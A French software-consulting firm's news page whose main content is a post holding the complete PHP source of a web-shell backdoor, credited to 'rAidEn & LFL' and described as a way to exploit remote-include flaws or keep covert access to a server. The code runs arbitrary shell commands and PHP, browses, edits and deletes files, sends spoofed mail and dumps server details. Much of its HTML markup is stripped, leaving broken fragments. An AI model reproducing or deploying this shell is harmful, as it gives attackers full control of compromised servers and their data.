>> Actualités

 
Request
N'hésitez pas à nous mettre à l'épreuve en nous confiant un cahier des charges, une demande quelconque.
Nous nous ferons un plaisir de vous répondre dans les plus brefs délais:
- Prestations software/vision
- Gestion de projets
- Consulting d'entreprise
 
Auteur : JCF posté le : 2011-05-23
 
 
.

print("Backdoor PHP codée par rAidEn & LFLbgcolor=\"white\" LINK=\"blue\" VLINK=\"blue\">");
print("

Exploit include v1.0

");
print("

Ce script permet d'exploiter une faille include ou une frame mal placée de type :
www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tant que backdoor sur un serveur pour garder une porte d'entrée dérobée.


par rAidEn & LFL , article publié dans The Hackademy Journal numéro 12

Spécial greetz à : Crash_FR, MatraX, Elboras, papar0ot, Lostnoobs, Icarus, Xelory, L_Abbe, Daedel, DHS-team, Carlito, xdream_blue, redils, IHC, Wanadobe.biz, #abyssal, #cod4, #hzv, #security-corp, #Revolsys, ...... et tout ceux que j'ai oublié & aussi et surtout à (feu)tim-team

");

/******Code source du système de remote*****/

$QS = $QUERY_STRING;
if(!stristr($QS, "separateur") && $QS!="") $QS .= "&separateur";
if(!stristr($QS, "separateur") && $QS=="") $QS .= "separateur";

/*pour les forms*********************************/
$tab = explode("&", $QS);
$i=0;
$remf = "";
while( $tab[$i] != "" && $tab[$i-1] != "separateur" )
{
$temp = str_replace(strchr($tab[$i], "="), "", $tab[$i]);
eval("\$temp2=\${$temp};");
$remf .= "."'>\n";
$i++;
}
/*
$temp = str_replace(strchr($tab[$i], "="), "", $tab[$i]);
if($temp!="")
{
eval("\$temp2=\${$temp};");
$remf .= "."'>\n";
}*/
/************************************************/


/*pour les links*********************************/
if($QS != "separateur")
$reml = "?" . str_replace(strchr($QS, "&separateur"), "", $QS) .
"&separateur";
else $reml = "?$QS";
$adresse_locale = $reml;
/************************************************/




print("
");
print("Exécuter une commande dans un shell
");
print("Exécuter du code PHP
");
print("Lister un répertoires
");
print("Gérer les fichiers
");
print("Envoyer un mail
");
print("Infos serveur
");
print("Contacter le créateur
");


/* récupération des variables : la fonction $_REQUEST n'existant pas avant php 4.1.0, vous devrez alors commenter ces lignes */
$option = $_REQUEST["option"];
$rep = $_REQUEST["rep"];
$nom = $_REQUEST["nom"];
$option_file = $_REQUEST["option_file"];
$cmd = $_REQUEST["cmd"];
$code = $_REQUEST["code"];
$msg = $_REQUEST["msg"];
$option_mail = $_REQUEST["option_mail"];
$destinataire = $_REQUEST["destinataire"];
$sujet = $_REQUEST["sujet"];
$message = $_REQUEST["message"];

if($option == 1){
print("
$remf Commande :
");
echo "
PS : peu de serveurs acceptent les commandes venant de PHP";
}

if($option == 2){
print("
$remf Code :
");
}

if($option == 3){
print("
$remf Répertoire à lister :
");
print("$rep");
}

if($option == 4){
print("
$remf");
print("
Nom du fichier :
");
print("");
print("Créer le
fichier");
print("Éditer le
fichier");
print("Supprimer le
fichier");
print("Lire le
fichier");
print("");
print("
");
}


if($option == 5){
print("
 $remf Destinataire : ");

    print("
Provenance du mail : 
");

    print("Adresse de retour : 
");

    print("Sujet : 
");

    print("Message : size=\"80\">
");
}

if($option == 6){
echo"Nom du serveur : $SERVER_NAME

";
echo"Adresse IP du serveur : $SERVER_ADDR
";
echo"Port utilisé par défault 80 : $SERVER_PORT
";
echo"Mail de l' admin : $SERVER_ADMIN

";


echo"Racine du serveur : $DOCUMENT_ROOT
";
echo"Adresse menant à COMMAND.COM : $COMSPEC
";
echo"Path installé sur le serveur : $PATH
";
echo"OS, SERVEUR, version PHP : $SERVER_SOFTWARE

";

echo"Version du protocole utilisé (HTTP) : $SERVER_PROTOCOL
";
echo"En-tête Accept du protocole HTTP : $HTTP_ACCEPT
";
echo"En tête User_agent du protocole HTTP : $HTTP_USER_AGENT
";
echo"En-tête Accept-Charset du protocole HTTP : $HTTP_ACCEPT_CHARSET
";
echo"En-tête Accept-Encoding du protocole HTTP : $HTTP_ACCEPT_ENCODING
";
echo"En-tête Accept-Language du protocole HTTP : $HTTP_ACCEPT_LANGUAGE
";
echo"En-tête Connection du protocole HTTP : $HTTP_CONNECTION
";
echo"En-tête Host du protocole HTTP : $HTTP_HOST

";

echo"Version de CGI : $GATEWAY_INTERFACE
";
echo"Version de récupération du form : $REQUEST_METHOD
";
echo"Argument de l' adresse : $QUERY_STRING
";
echo"Nom du script : $SCRIPT_NAME
";
echo"Chemin du script : $SCRIPT_FILENAME
";
echo"Adresse entière du script : $REQUEST_URI

";
}

/* Commande*******/
if($cmd != "")
{
echo "{${passthru($cmd)}}
";
}
/* Commande*******/


/* Exécution de code PHP**********/
if($code != ""){
$code = stripslashes($code);
eval($code);
}
/* Execution de code PHP**********/


/* Listing de rep******************/
if($rep != "")
{
if(strrchr($rep, "/") != "" || !stristr($rep, "/")) $rep .= "/";
$dir=opendir($rep);
while ($file = readdir($dir))
{
if (is_dir("$rep/$file") && $file!='.')
{
echo"
  • (rep) $file

    \n";
    }elseif(is_file("$rep/$file"))
    {
    echo "
  • href=\"$adresse_locale&option_file=read&nom=$rep$file\">(file) $file href=\"$adresse_locale&option_file=del&nom=$rep$file\">del href=\"$adresse_locale&option_file=edit&nom=$rep$file\">edit
    \n";
    }
    }
    }
    /* Listing de rep******************/


    /* Gestion des fichiers*********************/
    if($option_file == "mkdir" && $nom != "")
    {
    $fp = fopen($nom, "w");
    fwrite($fp, stripslashes($msg));
    print("Fichier crée/modifié");
    }

    if($option_file == "read" && $nom != "")
    {
    $fp = fopen($nom, "r");
    $file = fread($fp, filesize($nom));
    $file = htmlentities ($file, ENT_QUOTES);
    $file = nl2br($file);
    echo "
    $file";
    }

    if($option_file == "del" && $nom != "")
    {
    unlink($nom);
    print("Fichier effacé");
    }

    if($option_file == "edit" && $nom != "")
    {
    $fp = fopen($nom, "r");
    $file = fread($fp, filesize($nom));
    $file = htmlentities ($file, ENT_QUOTES);
    echo "
    $remf";
    echo "";
    echo "";
    echo "";
    echo "
    PS : les fichiers trop longs ne passent po :(";
    echo "
    ";
    }
    /* Gestion des fichiers*********************/


    /* Envoi de mails************************/
    if(($destinataire != "" ) && ($sujet != "") && ($message != "")){
    $option_mail = "From: $provenance \n";
    $option_mail .= "Reply-to: $retour \n";
    $option_mail .= "X-Mailer: Mailer by rAidEn \n";

    mail($destinataire, $sujet, $message, $option_mail);

    print("Mail envoyé a : $destinataire ...");
    }
    /* Envoi de mails************************/

    print("");
    /*print("
    		•
     
    Auteur : . posté le : 2008-09-29
     
     
    ;)

     
    Auteur : m1nt posté le : 2008-09-21
     

     

     

    Français English Deutsch Accueil Plan du Site Contactez-nous